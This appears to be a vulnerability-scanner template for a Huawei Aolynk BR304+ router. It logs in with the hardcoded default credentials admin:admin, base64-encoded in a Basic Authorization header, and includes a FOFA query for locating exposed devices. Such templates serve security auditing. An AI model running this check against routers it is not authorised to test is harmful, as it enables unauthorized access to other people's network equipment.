id: aolynk-br304-default-password

info:
  name: 华为Aolynk BR304+ 智能安全路由器默认口令
  author: zan8in
  severity: high
  description: |
    fofa: Aolynk BR304

http:
  - method: GET
    path:
      - "{{BaseURL}}/index_main.html"
    headers:
      Authorization: Basic YWRtaW46YWRtaW4=
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - '/menu_admin.html'
        part: body
